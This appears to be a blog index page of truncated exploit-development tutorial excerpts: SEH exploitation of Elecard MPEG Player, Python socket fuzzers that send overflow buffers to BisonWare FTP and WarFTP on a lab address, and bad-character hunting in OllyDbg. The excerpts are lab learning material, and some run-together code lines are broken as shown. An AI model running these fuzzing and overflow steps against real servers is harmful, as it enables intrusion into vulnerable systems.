codename scx030c06c

in this post i will write my steps to exploit media player application (Elecard MPEG Player) with SEH protection, and here's the steps : 1. install application in windows XP machine 2. do the information gathering about supported filetype 3. From IG i got the information : the target support...

SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software....

1. open application bisonWare FTP 2. test connection with nc 3. create fuzzer script with python import socket import sys import time s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = "\x41"*100 buffer+= "\r\n" s.connect(('192.168.56.101',21)) print "Connecting...." data = s.recv(1024) time.sleep(3) print...

Bad character is the characters that will make a payload failed to run because in register they change into a random character (usually become byte 20) now I will try to find bad characters in WarFTP application 1 run OllyDbg and attach WarFTP application 2 generate a byte characters with generatecode.pl...

Open and start warFTP application test connection to warFTP nc 192.168.56.101 21 Create fuzzer script with python : import sockets = socket.socket (socket.AF_INET, socket.SOCK_STREAM)buffer = "\x41"*1000s . connect (('192.168.56.101',21))data = s.recv(1024)print ("Sendingevildatavia USER...

A buffer overflow occurs when more data are written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable results in a program. Buffer overflows happen when there is inproper validation (no bounds prior to...